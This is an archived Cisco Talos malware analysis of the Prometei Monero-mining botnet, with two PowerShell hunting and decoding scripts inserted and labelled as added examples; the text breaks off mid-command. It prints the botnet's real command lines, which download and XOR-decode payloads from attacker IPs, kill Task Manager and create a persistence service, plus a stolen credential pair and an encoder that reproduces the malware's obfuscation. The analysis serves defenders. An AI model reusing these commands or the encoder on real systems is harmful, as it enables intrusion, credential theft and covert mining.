{
	"id": "153602d9-2148-4f2d-bfc4-7f6a2a640fef",
	"created_at": "2026-04-06T00:07:26.730322Z",
	"updated_at": "2026-04-10T03:20:18.204331Z",
	"deleted_at": null,
	"sha1_hash": "e2dd49c43c470375806d61d3a60efabcbc58f97e",
	"title": "Prometei botnet and its quest for Monero",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 816743,
	"plain_text": "Prometei botnet and its quest for Monero\r\nBy Vanja Svajcer\r\nPublished: 2020-07-22 · Archived: 2026-04-05 16:57:05 UTC\r\nNEWS SUMMARY\r\nWe are used to ransomware attacks and big-game hunting making the headlines, but there are still methods adversaries use to monetize their efforts in less intrusive ways.\r\nCisco Talos recently discovered a cryptocurrency-mining botnet we're calling \"Prometei\" that uses several techniques defenders are likely to spot, but which are not immediately obvious to end users.\r\nThese threats demonstrate several techniques of the MITRE ATT\u0026CK framework, most notably T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1035 (Service Execution), T1036 (Masquerading) and T1090 (Connection Proxy).\r\nAttackers are constantly reinventing ways of monetizing their tools. Cisco Talos recently discovered a complex campaign employing a multi-modular botnet with multiple ways to spread and a payload focused on providing financial benefit to the attacker by mining the Monero cryptocurrency. The actor employs various methods to spread across the network: SMB with stolen credentials, psexec, WMI and SMB exploits. The adversary also uses several crafted tools that help the botnet increase the number of systems participating in its Monero-mining pool.\r\nWhat's new?\r\nWe believe this is the first time anyone has documented Prometei's operations. The actor is actively maintaining all the modules and has been active since March 2020.\r\nHow did it work?\r\nThe infection starts with the main botnet file, which is copied from other infected systems over SMB using passwords retrieved by a modified Mimikatz module and exploits such as Eternal Blue. 
The actor is also aware of the latest SMB vulnerabilities such as SMBGhost, but no evidence of using this exploit has been found.\r\nThe botnet has more than 15 executable modules that are all downloaded and driven by the main module, which constantly communicates with the command and control (C2) server over HTTP. The data is encrypted with RC4, and the module shares the RC4 key with the C2 using asymmetric encryption.\r\nApart from a large focus on spreading across the environment, Prometei also tries to recover administrator passwords. The discovered passwords are sent to the C2 and then reused by other modules that attempt to verify the validity of the passwords on other systems using the SMB and RDP protocols.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 1 of 22\n\nSo what?\r\nDefenders need to be constantly vigilant and monitor the behavior of systems within their network. Attackers are like water: they will attempt to find the smallest crack to seep in. While organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.\r\nTechnical case overview\r\nIntroduction\r\nThis botnet was discovered by investigating telemetry information coming to Talos from Cisco AMP for Endpoints' install base. We regularly conduct hunting sessions to find new malware that may be running under the radar. 
Rules and command lines are one of the best starting points for hunting.\r\nPowerShell drove the first command line we discovered:\r\npowershell.exe \"if(-not (Test-Path 'C:\\windows\\dell\\miwalk.exe')) {$b64=$(New-Object Net.WebClient).DownloadS\r\nFrom then on, we started discovery by traversing the process parent-child graph and coming up to the parent module svchost.exe, which was run from an unusual path, C:\\Windows, rather than the C:\\Windows\\System32 folder.\r\nA search through the events for C:\\windows\\svchost.exe and the download IP address brings us to an even more interesting call, broken into individual commands for readability:\r\nC:\\Windows\\System32\\cmd.exe /C taskkill -f -im rdpcIip.exe\r\ndel C:\\windows\\dell\\rdpcIip.exe\r\npowershell.exe if(-not (Test-Path 'C:\\windows\\dell\\miwalk.exe')) {$b64=$(New-Object Net.WebClient).DownloadStrin\r\npowershell.exe if(-not (Test-Path 'C:\\windows\\dell\\rdpcIip.exe')) {$b64=$(New-Object Net.WebClient).DownloadStri\r\nC:\\Windows\\svchost.exe /sha1chk 58899ed72b617c7e89455d55f5663f44d7eb24d8 C:\\windows\\dell\\miwalk.exe\r\nC:\\Windows\\svchost.exe /sha1chk e5ffb2a8ceb70e7280fb5ac9f8acac389ed0181e C:\\windows\\dell\\rdpcIip.exe\r\nC:\\windows\\dell\\rdpcIip.exe ADMINISTRADOR Cohersa2019\r\nImmediately, we see that svchost has multiple functions. Apart from being the parent process of the PowerShell invocation that downloads additional components, it is also executed with the /sha1chk option. This indicates that it may also contain integrity-checking functionality for downloaded modules.\r\nTwo modules are downloaded and one of them, rdpcIip.exe, is launched, with its file name crafted so it looks like the legitimate Windows executable rdpclip.exe (a capital \"I\" stands in for the lowercase \"l\"). 
Finally, rdpcIip is launched with two arguments that look like they could be an administrator's user credentials.\r\nOver a period of more than two months, we followed the activity of this botnet and found more than 15 different modules organized in two main functional branches. Both branches can function fairly independently, which may indicate that we are dealing with another actor piggybacking on the main botnet functionality and using it to spread their own modules.\r\nThe adversaries developed the first branch in C++, and it uses a special type of obfuscation to evade analysis and detection in dynamic automated analysis systems. Its main modules (svchost, miwalk, rdpcIip and SearchIndexer) are clearly made to work together.\r\nTwo main branches of the Prometei (Prometheus) botnet.\r\nHowever, it is more likely that we are dealing with the same author, as the second branch is distributed through the same download server and is downloaded by the main bot svchost.exe. The second branch deals mainly with attempting to brute-force combinations of usernames and passwords over the SMB and RDP protocols, and it is developed using the .NET framework combined with free tools and modified open-source software. The second branch's main module, nvsync.exe, which communicates with its own C2, contains some indication that its purpose is cryptocurrency mining, but we have not found evidence of that.\r\nMain botnet module branch\r\nNow, let's look at the main botnet module branch. We'll refer to it as the \"main\" branch because it can function independently and conducts Monero cryptocurrency mining. This branch contains modules with the ability to communicate with the C2, spread laterally, steal user credentials and mine Monero. 
All modules of the main botnet branch are compiled as 64-bit applications, although during our hunting we also found 32-bit variants of the main botnet module.\r\nThe main branch also has auxiliary modules that provide the ability to proxy communications over the TOR or I2P networks, collect information about processes running on the system, check for open ports on target systems and crawl the file system in search of file names given as the argument to the module, typically Bitcoin cryptocurrency wallets.\r\nMain botnet module — Svchost.exe\r\nAlthough the main module is installed in the Windows folder as svchost.exe, it is spread laterally under the module names \"xsvc.exe\" and \"zsvc.exe\" and is downloaded for updating with PowerShell as up.exe.\r\nMain botnet installation and persistence\r\nAll bot versions are packed with UPX, likely to decrease their size. However, even early versions have another layer of obfuscation, which seems to be a simple XOR obfuscator that decrypts the rest of the code in memory and jumps to the original entry point.\r\nEarlier bot entry-point code with a simple obfuscator.\r\nLater versions of the bot employ a different packer, which depends on the existence of an external file to be properly unpacked. We have found this packer applied to the main bot module and to the modified Mimikatz executable miwalk.exe, used to obtain user credentials from system memory. 
Svchost.exe, the main bot, checks for the existence of the file \"C:\\Windows\\mscordata.dll\".\r\nCustom packer applied to the main bot and Mimikatz modules.\r\nIn addition to making manual analysis more difficult, this anti-analysis technique also avoids detection in dynamic automated analysis systems, such as Cisco Threat Grid. When execution begins, after UPX unpacking, it may take one of two paths. The first creates a text file \"c:\\windows\\temp\\setup_gitlog.txt\" containing the text \"PaiAuganMai Diag Utility - Setup\", then pings Google's DNS server 8.8.8.8, followed by the sysinfo.exe command, saving the output of both commands to the file c:\\Windows\\Temp\\sysinfo.txt. This is the decoy path, taken when the external file is absent, as it is in an automated sandbox that receives only the sample.\r\nWe found multiple samples that executed this functionality. The detection rate based on this behavior is relatively low.\r\nHowever, if the external file exists, the bot opens it and reads a single byte, eventually decrypting the main botnet code. The cpuid instruction is also used during the decryption. Initially, this suggested that an anti-VM technique may have been used to avoid execution of the bot in a virtual environment. However, this is not the case; the instruction is only used to retrieve some flags that are used in the decryption process.\r\nThe bot reads a single byte from a file and uses the byte to control execution flow.\r\nSince only a single byte is used, there are just 256 possible values (0 through 255) for the initialization of one of the decryption variables (in the 64-bit code it is the register r14d). There are several strategies for unpacking, but the easiest is to brute-force the register content. We can do this with an external script or by automating the debugger, which is what we used. 
We created a simple x64dbg script that allowed us to get to the required value after a few minutes.\r\n$j=0\r\nstart:\r\ninitdbg \"c:\\windows\\zsvc.exe\" //initialize the debugger with the file to be analysed\r\ncmp $pid,0 //successful initialization?\r\nje start\r\nbp 141092418 // set breakpoint to main and continue\r\nerun // we hit the entry point\r\nerun // we hit the main function\r\nbp 14108f441 //if this breakpoint is hit then success!!\r\nbp 14108f0f9 //if this breakpoint is hit set r14d to the counter $j and increment the counter\r\nbp 14108f331 //we failed go back to the beginning\r\nerun //continue\r\ncmp rip, 14108f0f9 //time to initialise r14d?\r\njne checkfail //if not have we failed and reached decoy code?\r\nr14d=$j\r\nlog {d:r14d} //log the current counter value\r\n$j = $j + 1\r\ncmp $j,255\r\nje end\r\nerun\r\ncheckfail:\r\ncmp rip, 14108f331 //are we in the decoy code, if yes restart debugging\r\njne checksuccess\r\ngoto start\r\nchecksuccess:\r\ncmp rip,14108f441 //Success!!! We found the value we need. End.\r\njne start\r\nend:\r\npause\r\nX64dbg script for unpacking the main bot code.\r\nFinally, after some time spent debugging and deobfuscating, we reached the main bot's deobfuscated C++ code, and from then on it is not difficult to find the main function.\r\nIt starts with an attempt to create the folder c:\\windows\\dell and proceeds to attempt to start the service UPlugPlay. If the service is successfully started, the bot exits. Otherwise, it assumes it has to install itself and set up the persistence mechanism.\r\nThe zsvc.exe copies itself to c:\\Windows\\svchost.exe and sets up a service named UPlugPlay, which is also visible in the command-line logs. 
Once the service is set up, it starts and connects to the C2 server.\r\ncmd.exe /C sc create UPlugPlay binPath= C:\\Windows\\svchost.exe Dcomsvc type=own DisplayName=UPlug-and-Play Host\r\nCreation of the UPlugPlay service as seen in the command-line log.\r\nCommunication with the C2 server is conducted over HTTP and is visible on the wire, although the commands and their results are transferred using RC4 encryption with a key generated on the client computer and stored in the registry values HKLM\\SOFTWARE\\Microsoft\\Fax\\MachineKeyId and HKLM\\SOFTWARE\\Microsoft\\Fax\\Encrypted\\MachineKeyId.\r\nThe RC4 key is shared over HTTP as a base64-encoded string in the enckey variable, encrypted asymmetrically with the C2 public key stored in the bot's data section.\r\nhttp://bk1.bitspiritfun2[.]net/cgi-bin/prometei.cgi?add=b64encodedmachineinfo\u0026h=SERVIDOR\u0026i=1Z2NJQOUX1A3A8CD\u0026enc\r\nAn example of the initial addition of a server to the botnet and its encryption key.\r\nThe HTTP form variable \"add\" contains base64-encoded information about the victim machine, including its domain name, model and processor type. For example:\r\ninfo {\r\n machine name\r\n domain.local\r\n 2x Intel(R) Xeon(R) CPU 3040 @ 1.86GHz\r\n 4Gb\r\n HP\r\n ML110 G4\r\n ProLiant ML110 G4\r\n 10.0.14393\r\n Serial number\r\n 20/07/2007\r\n}\r\nMachine information info block added to the C2 botnet database.\r\nOnce the host is recruited to the botnet, the main bot enters an infinite loop polling commands from the command and control server. 
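The hunting above started from process command lines, and the installation artifacts (svchost.exe running from C:\\Windows rather than System32, the /sha1chk switch, the UPlugPlay service, the Fax\\MachineKeyId registry values) are all things a defender can query directly. As an added example, not code from the Talos post or from the Prometei samples, the PowerShell below runs those indicators over a set of process command lines and then checks a host for the persistence artifacts; it also checks the WDigest UseLogonCredential value that the spreader module sets, described later in the post. The indicator patterns and the homoglyph check are this example's own, not a Talos rule; the sample command lines are three quoted in the post plus two benign lines constructed for contrast.

```powershell
# Added example: Prometei indicator hunt over command lines, plus local host triage.
# Patterns are this example's own, derived from the command lines quoted in the post.

$PrometeiIndicators = @(
    # svchost.exe directly under C:\\Windows; the legitimate binary lives in System32
    @{ Name = 'svchost outside System32';   Pattern = '(?i)windows.svchost\\.exe'; Exclude = '(?i)system32.svchost' }
    @{ Name = 'integrity check switch';     Pattern = '/sha1chk';                     Exclude = $null }
    @{ Name = 'UPlugPlay service';          Pattern = '(?i)sc create UPlugPlay|UPlug-and-Play Host'; Exclude = $null }
    @{ Name = 'dell staging folder';        Pattern = '(?i)windows.dell.';             Exclude = $null }
    @{ Name = 'download and XOR in memory'; Pattern = '(?i)DownloadString\\(.*-bxor';  Exclude = $null }
    @{ Name = 'Task Manager killed';        Pattern = '(?i)taskkill.*-im taskmgr\\.exe'; Exclude = $null }
)

function Find-PrometeiIndicators {
    param([Parameter(Mandatory)] [string[]] $CommandLines)
    # Names whose lowercase l can be faked with a capital I (rdpcIip.exe in the post) or the digit 1
    $legit = @('rdpclip.exe', 'svchost.exe', 'searchindexer.exe', 'msdtc.exe')
    foreach ($line in $CommandLines) {
        foreach ($ind in $PrometeiIndicators) {
            if (($line -match $ind.Pattern) -and -not ($ind.Exclude -and ($line -match $ind.Exclude))) {
                [pscustomobject]@{ Indicator = $ind.Name; CommandLine = $line }
            }
        }
        # Homoglyph masquerade: fold I and 1 to l; if that yields a well-known name the original did not spell, flag it
        foreach ($m in [regex]::Matches($line, '[A-Za-z0-9_-]+\\.exe')) {
            $token  = $m.Value
            $folded = ($token -creplace '[I1]', 'l').ToLowerInvariant()
            if (($legit -contains $folded) -and ($token.ToLowerInvariant() -ne $folded)) {
                [pscustomobject]@{ Indicator = ('homoglyph of {0}: {1}' -f $folded, $token); CommandLine = $line }
            }
        }
    }
}

function Test-PrometeiHost {
    # Persistence, key-storage, credential-caching and staging artifacts named in the post, checked locally
    $findings = @()
    if (Get-Service -Name 'UPlugPlay' -ErrorAction SilentlyContinue) { $findings += 'service UPlugPlay present' }
    foreach ($k in 'HKLM:\\SOFTWARE\\Microsoft\\Fax', 'HKLM:\\SOFTWARE\\Microsoft\\Fax\\Encrypted') {
        if (Get-ItemProperty -Path $k -Name MachineKeyId -ErrorAction SilentlyContinue) {
            $findings += ('RC4 key value {0}\\MachineKeyId' -f $k)
        }
    }
    $wd = Get-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' -Name UseLogonCredential -ErrorAction SilentlyContinue
    if ($wd -and $wd.UseLogonCredential -eq 1) { $findings += 'WDigest UseLogonCredential=1: plaintext credentials cached in LSASS' }
    foreach ($p in 'C:\\Windows\\svchost.exe', 'C:\\Windows\\dell', 'C:\\Windows\\mscordata.dll') {
        if (Test-Path -LiteralPath $p) { $findings += ('artifact present: {0}' -f $p) }
    }
    return ,$findings
}

# Constructed sample: three command lines quoted in the post and two benign lines that must not fire
$sample = @(
    'C:\\Windows\\System32\\cmd.exe /C taskkill -f -im rdpcIip.exe',
    'C:\\Windows\\svchost.exe /sha1chk 58899ed72b617c7e89455d55f5663f44d7eb24d8 C:\\windows\\dell\\miwalk.exe',
    'cmd.exe /C sc create UPlugPlay binPath= C:\\Windows\\svchost.exe Dcomsvc type=own DisplayName=UPlug-and-Play Host',
    'C:\\Windows\\System32\\svchost.exe -k netsvcs -p',
    'C:\\Windows\\System32\\rdpclip.exe'
)
Find-PrometeiIndicators -CommandLines $sample | Format-Table -AutoSize
Test-PrometeiHost
```

Feed Find-PrometeiIndicators with Sysmon event ID 1 or EDR process-creation command lines; the two benign lines in the sample produce no output, and the homoglyph check is deliberately case-sensitive, since a case-insensitive match would treat rdpcIip.exe and rdpclip.exe as different spellings of the same unknown name. Test-PrometeiHost needs local administrator rights to read HKLM and C:\\Windows.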
As is quite common with remote access trojans and bots, there are handlers for the usual commands that allow the attacker to control the infected system.\r\nThe bot expects one of the following commands:\r\nrun — Execute a program/file using the ShellExecute API\r\nexec — Execute a program using the CreateProcess API\r\nsrun — Check that the path exists, calculate its SHA1 and execute using CreateProcess\r\ncmdt — Launch a command shell, redirect stdin and stdout to pipes over HTTP\r\ncmd — Launch a command shell, redirect stdin and stdout to pipes over HTTP\r\nscmd — Execute a single command\r\nver — Get the bot's version\r\nextip — Get the bot's external IP address\r\nenc — Get/set the RC4 encryption key\r\nupdatev3 — Download the updated bot to svchost2.exe, start the process, then remove the file. If that is not successful, terminate the process first.\r\nset_timeout — Set the period for connecting to the C2 server\r\nset_cc — Set a new C2 server\r\ntouch — Open a file and write a single byte to change checksums and access times\r\nwget — Download a file\r\nxwget — Download a file, save it, then open it and XOR it using a single-byte XOR with initial key 0x42 and addition of 0x42 for each byte\r\nstop_mining — Terminate the mining process by calling cmd.exe /C taskkill -f -im SearchIndexer.exe. If that did not work, try launching a thread that will call taskkill.\r\nstart_mining1 — Read C:\\windows\\dell\\Desktop.dat to get parameters and launch SearchIndexer.exe\r\nstart_mining — Request desktop.txt from the C2, save it to Desktop.dat and launch the miner with parameters read from Desktop.dat\r\nquit — Terminate the bot using TerminateProcess\r\nquit2 — Exit the command handler loop without calling TerminateProcess\r\ngetinfo — Get information about the infected system using WMI WQL queries and other methods\r\nCommunication with the C2 server is conducted either directly over HTTP or through TOR or I2P proxies. In our analysis, we only managed to find the c:\\windows\\dell\\msdtc.exe file, whose main purpose is to proxy requests over TOR to the C2 server https://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi. Another module, c:\\windows\\dell\\msdtc2.exe, may exist, which would allow the bot to route its requests over the I2P network.\r\nThe main botnet module can function alone as a remote access trojan, but the main purpose of this actor is to mine Monero coins and possibly to steal Bitcoin wallets, potentially protected by passwords stolen with Mimikatz.\r\nOther modules are available and can be downloaded by the main bot module. The downloads are the initial activity we detected in our telemetry.\r\nDuring our research, we found two main C2 servers: bk1.bitspiritfun2[.]net and p1.feefreepool[.]net. The first was active until June 8, when the IP address of the server changed to 75.2.37[.]224, owned by Amazon. The response from the server, \"403 Forbidden,\" may indicate a successful takeover of the botnet. 
The previous two addresses were located in Germany and France.\r\nDNS query activity for bk1.bitspiritfun2[.]net as seen by Cisco Umbrella.\r\nThe second server is hosted in Germany on the IP address 88.198.246[.]242, owned by Hetzner.\r\nDNS query activity for p1.feefreepool[.]net as seen by Cisco Umbrella.\r\nThe requests for the C2 servers come from a fairly wide range of countries, with most requests coming from systems in the United States, Brazil, Turkey, Pakistan, China, Mexico and Chile.\r\nThe download server 103.11.244[.]221 is hosted in Hong Kong, while 208.66.132[.]3, 69.28.95[.]50 and 69.84.240[.]57 are in the U.S.\r\nSpreader (rdpcIip.exe) and password stealer (miwalk.exe)\r\nThe second most notable module allows the bot to spread laterally over SMB. RdpcIip.exe is coupled with miwalk.exe. The wmain function starts by checking whether the credentials file c:\\windows\\dell\\ssldata2.dll exists, as well as c:\\windows\\dell\\ssldata2_old.dll, which is used to store older credentials.\r\nThe spreader module then sets the registry value HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential to 1, so that WDigest keeps plaintext credentials in LSASS memory, where the password-stealer module can retrieve them.\r\nThe spreader then launches miwalk.exe, a modified version of Mimikatz that steals credentials and stores them in ssldata2.dll. If the credentials are successfully stolen, the spreader parses the credentials file, retrieves the IPv4 address mapping table to extract the IP addresses of the local network interfaces, and saves the local networks to the file c:\\windows\\dell\\net.txt.\r\nThe spreader iterates over the network saved in net_\u003cip_address_of_the_interface\u003e.txt and attempts to spread to systems within that network. 
This is repeated for every interface. The spreader attempts to establish and authenticate an SMB session using stolen credentials or the guest account without a password, and to copy the main bot module as xsvc.exe or zsvc.exe to the target system.\r\nIf the main bot module is successfully copied, the spreader uses either psexec or WMI to remotely launch the copied module.\r\nIf the attempts with stolen credentials are not successful, the spreader attempts to launch a variant of the Eternal Blue exploit, depending on the remote operating system version, and sends shellcode to install and launch the main bot module.\r\nMonero mining payload (XMRig)\r\nThe final payload of the main functional branch is a sample of the open-source Monero mining software XMRig, version 5.5.3. The miner is located in the folder c:\\windows\\dell under the name SearchIndexer.exe. The XMRig payload is downloaded by the main bot module.\r\nC:\\Windows\\System32\\cmd.exe /C powershell.exe\r\nif(-not (Test-Path 'C:\\windows\\dell\\Desktop.dat')) {\r\n(New-Object Net.WebClient).DownloadFile('http://208.66.132[.]3:8080/Desktop.txt', 'C:\\Windows\\dell\\Desktop.dat')\r\n}\r\nif(-not (Test-Path 'C:\\windows\\dell\\WinRing0x64.sys')) {\r\n$b64 = $(New-Object Net.WebClient).DownloadString('http://208.66.132[.]3:8080/dllr0.php');\r\n$data = [System.Convert]::FromBase64String($b64);\r\n$bt = New-Object Byte[]($data.Length);\r\nFOR ([int]$i = 0; $i -lt $data.Length; $i++){\r\n $bt[$i] = ((($data[$i]+0xFE) -band 0xFF) -bXOR 255);\r\n }\r\n[io.file]::WriteAllBytes('C:\\windows\\dell\\WinRing0x64.sys',$bt);\r\n}\r\nif(-not (Test-Path 'C:\\windows\\dell\\SearchIndexer.exe')) {\r\n$b64=$(New-Object Net.WebClient).DownloadString('http://208.66.132[.]3:8080/srchindx2.php');\r\n$data=[System.Convert]::FromBase64String($b64);\r\n$bt=New-Object Byte[]($data.Length);\r\n[int]$j=0;\r\n FOR([int]$i=0;$i -lt $data.Length; $i++){\r\n $j+=66;$bt[$i]=(((($data[$i]) -bXOR (($i*3) -band 0xFF))-$j) -band 0xFF);\r\n }\r\n[io.file]::WriteAllBytes('C:\\windows\\dell\\SearchIndexer.exe',$bt);\r\n}\r\ntaskkill -f -im taskmgr.exe\r\nC:\\Windows\\svchost.exe /sha1chk fcd80a03388f0f73a8718d18291590b77ac10dd2 C:\\windows\\dell\\SearchIndexer.exe\r\nThe command line to download and check the integrity of the XMRig miner as visible in the log. Note that Task Manager (taskmgr.exe) is killed before the integrity check and launch of the miner.\r\nThe miner is first packed with UPX and then with a relatively simple XOR packer that adds a new PE section, .ucode, to the executable. This is similar to the packer in earlier versions of the main bot module.\r\nThe miner is called by the main bot module svchost.exe when the C2 issues the command start_mining. Svchost gets the command-line parameters, such as the mining server, the miner username, password and the protocol used for mining, from the C2. The launch of the miner is visible in the command-line log of the infected systems.\r\nC:\\windows\\dell\\SearchIndexer.exe -o stratum+tcp://srv1.feefreepool[.]net:80 -u 4A1txQ9L8h8NqF4EtGsZDP5vRN3yTVK\r\nIf we search for this particular account on Monerohash.com, we get a result that shows this botnet consistently achieving between 700 KH/s and 950 KH/s, which implies the number of infected systems is in the low thousands. 
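The three byte-level transforms the post documents (the xwget command's running-key XOR, and the two decode loops above for dllr0.php and srchindx2.php) are simple enough to invert, which lets a responder recover a module from a captured HTTP body and then apply the same SHA1 comparison the bot performs with /sha1chk. The PowerShell below is an added example, not code from the post or from the samples: the decoders mirror the loops quoted above, the encoders are their inverses (added so the round trip can be demonstrated on a constructed input), and the assumption that the xwget key wraps modulo 256 is this example's own.

```powershell
# Added example: decode Prometei module downloads and verify them the way /sha1chk does.
# The transforms follow the PowerShell loops quoted in the post; the sample data is constructed.

function ConvertFrom-PrometeiBytes {
    param(
        [Parameter(Mandatory)] [byte[]] $Data,
        [Parameter(Mandatory)] [ValidateSet('xwget', 'dllr0', 'srchindx2')] [string] $Scheme
    )
    $out = New-Object byte[] $Data.Length
    switch ($Scheme) {
        'xwget' {
            # Running single-byte key: starts at 0x42 and grows by 0x42 per byte (wrap modulo 256 is assumed here)
            $k = 0x42
            for ($i = 0; $i -lt $Data.Length; $i++) {
                $out[$i] = $Data[$i] -bxor $k
                $k = ($k + 0x42) -band 0xFF
            }
        }
        'dllr0' {
            # WinRing0x64.sys loop: add 0xFE modulo 256, then XOR with 0xFF
            for ($i = 0; $i -lt $Data.Length; $i++) {
                $out[$i] = (($Data[$i] + 0xFE) -band 0xFF) -bxor 0xFF
            }
        }
        'srchindx2' {
            # SearchIndexer.exe loop: XOR with (3*i mod 256), then subtract a counter that steps by 66.
            # Only the low byte of the counter matters, so it is kept modulo 256 instead of growing unbounded.
            $j = 0
            for ($i = 0; $i -lt $Data.Length; $i++) {
                $j = ($j + 66) -band 0xFF
                $out[$i] = (($Data[$i] -bxor (($i * 3) -band 0xFF)) - $j) -band 0xFF
            }
        }
    }
    return ,$out
}

function ConvertTo-PrometeiBytes {
    # Inverse transforms; used here only to build test vectors for the decoder
    param(
        [Parameter(Mandatory)] [byte[]] $Data,
        [Parameter(Mandatory)] [ValidateSet('xwget', 'dllr0', 'srchindx2')] [string] $Scheme
    )
    if ($Scheme -eq 'xwget') { return ,(ConvertFrom-PrometeiBytes -Data $Data -Scheme 'xwget') }  # XOR is its own inverse
    $out = New-Object byte[] $Data.Length
    $j = 0
    for ($i = 0; $i -lt $Data.Length; $i++) {
        if ($Scheme -eq 'dllr0') {
            $out[$i] = (($Data[$i] -bxor 0xFF) - 0xFE) -band 0xFF
        } else {
            $j = ($j + 66) -band 0xFF
            $out[$i] = (($Data[$i] + $j) -band 0xFF) -bxor (($i * 3) -band 0xFF)
        }
    }
    return ,$out
}

function Get-Sha1Hex {
    param([Parameter(Mandatory)] [byte[]] $Bytes)
    $hash = [System.Security.Cryptography.SHA1]::Create().ComputeHash($Bytes)
    return -join ($hash | ForEach-Object { $_.ToString('x2') })
}

function Test-PrometeiModule {
    # The bot's own acceptance test: the SHA1 of the decoded file must equal the hash given to /sha1chk.
    # The MZ check is the quickest sanity test that a decode produced a PE at all.
    param([Parameter(Mandatory)] [byte[]] $Decoded, [Parameter(Mandatory)] [string] $ExpectedSha1)
    $hex = Get-Sha1Hex -Bytes $Decoded
    [pscustomobject]@{
        LooksLikePE = ($Decoded.Length -ge 2 -and $Decoded[0] -eq 0x4D -and $Decoded[1] -eq 0x5A)
        Sha1        = $hex
        HashMatches = ($hex -eq $ExpectedSha1.ToLowerInvariant())
    }
}

# Constructed stand-in for a module (an MZ header followed by filler bytes); not a real payload
$plain    = [byte[]]((0x4D, 0x5A) + (1..62))
$expected = Get-Sha1Hex -Bytes $plain       # stands in for the hash seen on the /sha1chk command line
foreach ($scheme in 'xwget', 'dllr0', 'srchindx2') {
    $wire    = ConvertTo-PrometeiBytes -Data $plain -Scheme $scheme   # what the HTTP body would carry
    $decoded = ConvertFrom-PrometeiBytes -Data $wire -Scheme $scheme
    $result  = Test-PrometeiModule -Decoded $decoded -ExpectedSha1 $expected
    if (-not ($result.LooksLikePE -and $result.HashMatches)) { throw ('decode of {0} failed' -f $scheme) }
    $result | Add-Member -NotePropertyName Scheme -NotePropertyValue $scheme -PassThru
}
```

Against a real capture, read the Base64 response body, run it through [Convert]::FromBase64String and the matching decoder, and compare the SHA1 with the value on the /sha1chk line from the same host; a mismatch with a valid MZ header usually means the server rotated the module and the log's hash belongs to an earlier build.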
The earning potential of the botnet is relatively small: during its four-month run, it earned its owner just under $5,000 USD, or about $1,250 per month on average.\r\nEarnings of the Monero mining botnet on July 8, 2020.\r\nThis is consistent with the indications of the Monero mining calculator available on Cryptocompare.com.\r\nMonero crypto mining calculator showing the earning potential of the botnet.\r\nAlthough earnings of $1,250 per month don't sound like a significant amount compared to some other cybercriminal operations, for a single developer in Eastern Europe this is more than the average monthly salary in many countries.\r\nPerhaps that is why, if we look at the embedded paths to program database files in many botnet components, we see a reference to the folder c:\\Work.\r\nC:\\Work\\Tools_2019\\misc\\tor_hidden_svc\\darkread\\x64\\Release\\darkread.pdb\r\nC:\\Work\\Tools_2019\\prometei\\RDPBrute2016.NET\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nvsync.pdb\r\nC:\\Work\\Tools_2019\\prometei\\nvstub\\Release\\nvstub.pdb\r\nC:\\Work\\Tools_2019\\prometei\\psbrute\\Release\\psbrute.pdb\r\nC:\\Work\\Tools_2019\\walker\\netwalker\\x64\\Release\\rdpcIip.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\chk445\\Release\\chk445.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\crawler\\Release\\crawler.pdb\r\nOther auxiliary modules\r\nApart from the main four modules, the botnet also contains multiple auxiliary modules that are downloaded and run on a command from the C2 server.\r\nCrawler.exe is a simple file system crawler that searches the local file system for file names specified as the parameter. 
We have observed low activity of the module, and its usage indicates the intention of the actor to find Bitcoin wallets on infected systems.\r\nChk445.exe is a simple tool that checks whether port 445 is open on the targeted system. Ztasklist.exe is a tool that enumerates all the running processes and\r\nThe modules smcard.exe and msdtc.exe are tasked with communicating with the C2 servers over TOR. Smcard.exe is the TOR relay that connects the infected system to the TOR network and starts a SOCKS proxy on localhost port 9050. Msdtc.exe is a proxy client driven by the main bot module. Its command-line parameter is simply a Base64-encoded URL; the request to the gb7ni5rgeexdcncj[.]onion C2 server is then routed through the TOR network.\r\nNvstub branch\r\nThe second botnet branch, which we're calling \"Nvstub,\" has its own functionality and a different C2.\r\nSvchost first attempts to delete several files and then downloads the executables required to extract a 7-Zip archive that contains all components of the Nvstub branch. The archive is extracted by the previously downloaded 7z.exe utility. The Nvstub archive, _agent.7z, is password-protected with the password \"horhor123\". 
Once the agent is extracted into the C:\\Windows\\dell folder, the main botnet module launches nvstub.exe, the first module of the second branch, with a single command-line parameter that contains the IP address of the C2 and its password.\r\nC:\\Windows\\System32\\cmd.exe /C taskkill -f -im SearchIndexer.exe\r\ndel C:\\Windows\\dell\\_agent.7z\r\ntaskkill -f -im nvsync.exe\r\ndel C:\\windows\\dell\\nvsync.exe\r\ndel C:\\windows\\dell\\ps.exe\r\ntaskkill -f -im socks.exe\r\ndel C:\\windows\\dell\\socks.exe\r\ndel C:\\windows\\dell\\nvsync2.ex\r\ndel C:\\windows\\dell\\nvsync4.exe\r\ndel C:\\windows\\dell\\winpr2.dll\r\ndel C:\\windows\\dell\\freerdp2.dll\r\ndel C:\\windows\\dell\\freerdp-client2.dll\r\ndel C:\\windows\\dell\\nvstub.exe\r\ndel C:\\Windows\\dell\\_agent.7z\r\npowershell.exe if(-not (Test-Path 'C:\\windows\\dell\\7z.dll')) {(New-Object Net.WebClient).DownloadFile('http://20\r\nC:\\Windows\\svchost.exe /sha1chk 48bcecd5d3f293cdc8356aee5ec4bab3252493fb C:\\windows\\dell\\7z.exe\r\nC:\\Windows\\svchost.exe /sha1chk 98a5ee5d689d664a14bb9a680c6e4fec5e752842 C:\\windows\\dell\\7z.dll\r\nC:\\Windows\\svchost.exe /sha1chk c42ab26ad284d52aefa2d40b7f4bf9a95109a5ff C:\\windows\\dell\\_agent.7z\r\nC:\\windows\\dell\\7z x C:\\Windows\\dell\\_agent.7z -phorhor123 -oC:\\Windows\\dell -y\r\ndel C:\\Windows\\dell\\_agent.7z\r\ndel 